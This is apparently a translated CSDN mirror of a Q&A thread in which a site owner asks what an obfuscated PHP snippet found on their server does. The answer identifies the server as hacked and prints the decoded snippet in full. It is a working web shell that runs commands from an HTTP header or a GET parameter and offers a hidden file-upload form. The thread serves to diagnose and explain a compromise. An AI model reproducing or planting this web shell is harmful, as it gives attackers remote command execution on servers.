我的网站上传了可疑代码

有人可以解释一下这个片段的效果是什么:</ p>

eval (gzinflate(str_rot13(BASE64_DECODE( 'DdHJZaJAAADQX8ktQWQAISzWWSVyUAdOAU6WhliKpUwEpExx8esn7xfe1 + E / L0WSNzzHza5rSI + 8iSe8G6fhdOimPbdY4hELHz8ZQbsM794x0ZOwNxaooVyjPDqIt16eNJbkEyo0fMZegybPsQ + FSvKaE4xNv6Za7cURokS3tgFbjtIzVaJECOXQcc / HRO9oVHY9iTSnq58 / F + HUuSBxTiWIVrAZ6ZW9kYle2YPOTrxXE2KGRSDzmsC113CcKRnd3asSrIEwz2gh8uz3zJTKvHFXy5YPz1Uti1xshTfomvsGFyUW6ray21bNtpgwI6UmdkJV4Wk314QUgjH32JAkfbBhuvp3kcD + oiOz7MetE3w / litBrktQNC5nZOpGyYrmV6kKVgZa02bImL6Zy4JRYKbqgM0xIS6X + Iy74fai3gvJgc9ItPKKC3wESZWwTWcEfGealUXmof1P + svlFWIU7hENqMO6YlDopKeX3kSGFVSSZufsjBq3CeH8RVlAB51qzzJLZMemFnabbHkAzgFoU / B2XAXsnqPgJjIheHq8REYvu + L3FpcNIh0FglectVd7SV8iIThgOtI22K5sfCqf9LwdyRi86hDaM2MPzHzLdToOPdO6664iqwHH9LL9XDD8evrYDv6DiDdLlHwGsuuDTdYhzYaBXSqRySX4 / ufX37evz / 8 =')))); </ p>
</ div>

展开原文

原文

Could someone explain me what is the effect of this snippet :

eval(gzinflate(str_rot13(base64_decode('DdHJZaJAAADQX8ktQWQAISzWWSVyUAdOAU6WhliKpUwEpExx8esn7xfe1+e/L0WSNzzHza5rSI+8iSe8G6fhdOimPbdY4hELHz8ZQbsM794x0ZOwNxaooVyjPDqIt16eNJbkEyo0fMZegybPsQ+FSvKaE4xNv6Za7cURokS3tgFbjtIzVaJECOXQcc/HRO9oVHY9iTSnq58/F+HUuSBxTiWIVrAZ6ZW9kYle2YPOTrxXE2KGRSDzmsC113CcKRnd3asSrIEwz2gh8uz3zJTKvHFXy5YPz1Uti1xshTfomvsGFyUW6ray21bNtpgwI6UmdkJV4Wk314QUgjH32JAkfbBhuvp3kcD+oiOz7MetE3w/litBrktQNC5nZOpGyYrmV6kKVgZa02bImL6Zy4JRYKbqgM0xIS6X+Iy74fai3gvJgc9ItPKKC3wESZWwTWcEfGealUXmof1P+svlFWIU7hENqMO6YlDopKeX3kSGFVSSZufsjBq3CeH8RVlAB51qzzJLZMemFnabbHkAzgFoU/B2XAXsnqPgJjIheHq8REYvu+L3FpcNIh0FglectVd7SV8iIThgOtI22K5sfCqf9LwdyRi86hDaM2MPzHzLdToOPdO6664iqwHH9LL9XDD8evrYDv6DiDdLlHwGsuuDTdYhzYaBXSqRySX4/ufX37evz/8='))));

1个回答



您的服务器已被黑客入侵。 请参见 https://serverfault.com/questions/218005/how-do - 用于处理受损服务器以获取恢复提示。 此代码允许攻击者将他们想要的任何文件上传到您的服务器。 它解码为:</ p>

 &lt;?php error_reporting(0);  ?&gt; 
&lt;?php system($ _ SERVER [“HTTP_SHELL”]);
if($ _GET [“x”] ==“kaMtiEz”){
?&gt;
&lt; form method =“POST” enctype =“multipart / form-data”action =“&lt;?$ _ SERVER [”PHP_SELF“]?&gt;”&gt;
&lt; input type =“file”name =“myFile”&gt;&lt; input type =“ 提交“name =”ok“value =”上传“&gt;
&lt; / form&gt;
&lt;?php
if(isset($ _ POST [”ok“])&amp;&amp; isset($ _ FILES [”myFile“ ])){
$ file = $ _FILES [“myFile”] [“tmp_name”];
$ name = $ _FILES [“myFile”] [“name”];
if(!move_uploaded_file($ file, $ name)){
echo“无法上传文件”;
} else {
echo“File Uploaded ...”;
}
}
}
nif(!empty($ _ GET [“ x“])){
echo”&lt; pre&gt;“;
系统($ _ GET [”x“]);
echo”Copyright 2011 by kaMtiEz - MagelangCyber​​ Team!d0nt rem0ve copyright if if real hax0r&lt; / pre&gt;“;
退出;
}
?&gt;
</ code> </ pre>
</ div>

展开原文

原文

Your server has been hacked. See https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server for recovery tips. This code allows an attacker to upload any file they want to your server. It decodes to:

<?php error_reporting(0); ?>
<?php system($_SERVER["HTTP_SHELL"]);
if ($_GET["x"]=="kaMtiEz") {
?>
<form method="POST" enctype="multipart/form-data" action="<?$_SERVER["PHP_SELF"]?>">
<input type="file" name="myFile"><input type="submit" name="ok" value="Upload">
</form>
<?php
if (isset($_POST["ok"]) && isset($_FILES["myFile"])) {
   $file = $_FILES["myFile"]["tmp_name"];
   $name = $_FILES["myFile"]["name"];
   if (!move_uploaded_file($file, $name)) {
       echo "Unable to upload file";
   } else {
       echo "File Uploaded...";
   }
}
    }
if (!empty($_GET["x"])) {
    echo "<pre>";
    system($_GET["x"]);
    echo "Copyright 2011 by kaMtiEz - MagelangCyber Team ! d0nt rem0ve copyright if u real hax0r </pre>";
    exit;
}
?>

duanfengdian7014
duanfengdian7014 好的我会进一步调查谢谢
大约 5 年之前 回复
dpp34603
dpp34603 无所谓。 他们可以创建一个特殊的文件名,可以将move_uploaded_file放入您的服务器具有写访问权限的任何文件夹中。 不要相信服务器。
大约 5 年之前 回复
dshtze500055
dshtze500055 我检查了加载此文件的同一文件夹,我没有找到任何其他加载的文件。
大约 5 年之前 回复
dongxing1960
dongxing1960 您的服务器受到了严重损害,他们可能上传了名为$ _FILES [“myFile”] [“name”]的文件,如/ etc / something / critical。 你不认为他们做了什么,但你认为你的服务器在此之前是安全的,对吗?
大约 5 年之前 回复
drwurqczo39355510
drwurqczo39355510 幸运的是,包含此代码段的上传文件的结果URL被混淆+以便能够获取您必须拥有管理员帐户的URL + URL强制下载文件而不执行。
大约 5 年之前 回复
dqy1265
dqy1265 浪费的天赋就是我所说的。 实际上,这是一种耻辱。
大约 5 年之前 回复
dtrvzd1171
dtrvzd1171 小偷中的荣誉,似乎。
大约 5 年之前 回复
dsimib1625
dsimib1625 那个版权虽然......
大约 5 年之前 回复
Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
立即提问
相关内容推荐